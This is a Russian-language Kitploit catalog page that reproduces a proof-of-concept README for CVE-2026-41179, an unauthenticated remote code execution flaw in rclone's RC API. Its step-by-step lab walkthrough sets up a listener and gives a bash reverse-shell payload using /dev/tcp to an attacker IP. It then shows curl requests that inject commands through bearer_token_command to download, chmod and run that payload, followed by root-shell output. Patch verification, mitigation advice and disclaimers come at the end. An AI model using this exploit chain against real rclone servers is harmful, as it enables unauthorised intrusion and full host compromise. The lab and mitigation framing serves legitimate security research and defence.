Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41179 — PoC для CVE-2026-41179 | Kitploit
Инструменты/GitHubGitHub/pssec-io/cve-2026-41179
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

PoC для CVE-2026-41179

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41179 — rclone RC API: неаутентифицированное удаленное выполнение кода (RCE)

⚠️ ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ Этот репозиторий предназначен строго для исследований в области безопасности, образования и авторизованных лабораторных сред. PSSec и соавторы этого репозитория не одобряют, не поддерживают и не несут никакой ответственности за любое несанкционированное, незаконное или вредоносное использование информации, кода или методик, содержащихся здесь. Используя этот репозиторий, вы соглашаетесь с тем, что несете полную ответственность за свои действия и будете проводить тестирование только против систем, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.


Обзор

CVE-2026-41179 — это критическая уязвимость неаутентифицированного удаленного выполнения кода (RCE) во встроенном API удаленного управления (RC) rclone, затрагивающая версии с 1.48.0 по 1.73.4.

Скачать инструмент
ПараметрЗначение
CVECVE-2026-41179
Оценка CVSS9.8 (Критический)
Затронутые версииrclone 1.48.0 – 1.73.4
Исправленная версияrclone 1.73.5
КомпонентRC API (эндпоинт /operations/fsinfo)
Вектор атакиСеть — аутентификация не требуется

Как это работает

rclone поставляется со встроенным HTTP-интерфейсом удаленного управления (rcd). Эндпоинт /operations/fsinfo принимает предоставленную пользователем строку fs=, которая анализируется и используется для создания бэкенда — включая бэкенд WebDAV. Бэкенд WebDAV поддерживает параметр bearer_token_command, который передается напрямую в exec.Command() без санитизации. Поскольку на этом эндпоинте по умолчанию не требуется аутентификация, неаутентифицированный злоумышленник может инициировать выполнение произвольных команд ОС от имени пользователя процесса rclone.

Цепочка атаки вкратце:

root@kitploit:~
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user

Структура репозитория

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
├── patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
├── poc.sh                     # Reverse shell payload
└── instructions               # Step-by-step lab walkthrough

Лабораторная настройка и эксплуатация (пошагово)

Предварительные требования

  • Docker
  • Слушатель: penelope или netcat
  • Python 3 (для раздачи полезной нагрузки)

Шаг 1 — Сборка уязвимого Docker-образа

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

Собирает контейнер на базе Debian-slim с запущенным rclone v1.69.3 и RC API, доступным на порту 5572.


Шаг 2 — Запуск уязвимого контейнера

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

Теперь RC API доступен без аутентификации по адресу http://127.0.0.1:5572.


Шаг 3 — Запуск слушателя

root@kitploit:~
penelope -p 5555
# OR
nc -lvnp 5555

Шаг 4 — Настройка полезной нагрузки reverse shell

Отредактируйте poc.sh, указав IP атакующего и порт прослушивания:

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

Шаг 5 — Раздача полезной нагрузки по HTTP

Выполните эту команду из той же директории, где находится poc.sh:

root@kitploit:~
python3 -m http.server 8888

Шаг 6 — Загрузка полезной нагрузки на целевую систему

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

Шаг 7 — Предоставление полезной нагрузке прав на выполнение

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

Шаг 8 — Запуск полезной нагрузки

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

Шаг 9 — Получение shell

Проверьте ваш слушатель — вы должны получить root shell из контейнера:

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

Шаг 10 — Проверка исправления

Повторите шаги 1–8, используя исправленный образ, чтобы убедиться, что уязвимость устранена:

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

Отправьте тот же curl-запрос на порт 5573 — команда не должна выполниться.


Устранение уязвимости

  • Обновите rclone до версии v1.73.5 или новее — теперь аутентификация включена по умолчанию на всех RC-эндпоинтах.
  • Если немедленное обновление невозможно, запускайте rcd с флагами --rc-user и --rc-pass, чтобы требовать ввода учетных данных.
  • Ограничьте сетевой доступ к RC-порту (5572) с помощью правил межсетевого экрана — он никогда не должен быть доступен из недоверенных сетей.
  • Рассмотрите возможность явного указания --rc-no-auth=false (новое значение по умолчанию в исправленных версиях) в скриптах запуска.

Отказ от ответственности

Этот репозиторий предоставлен только в образовательных целях и для авторизованных исследований в области безопасности. PoC-код демонстрирует реальную уязвимость в контролируемой лабораторной среде Docker.

PSSec и все соавторы:

  • Не разрешают и не поощряют эксплуатацию систем без явного письменного разрешения владельца системы.
  • Не несут никакой ответственности за ущерб, потерю данных, юридические последствия или неправомерное использование этого материала.
  • Рекомендуют проводить все тестирования только в изолированных лабораторных средах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Несанкционированное использование этого кода против производственных систем или систем, которыми вы не владеете, может нарушать законы о компьютерном мошенничестве и киберпреступлениях в вашей юрисдикции.


CVE-2026-41179 — Исследование: PSSec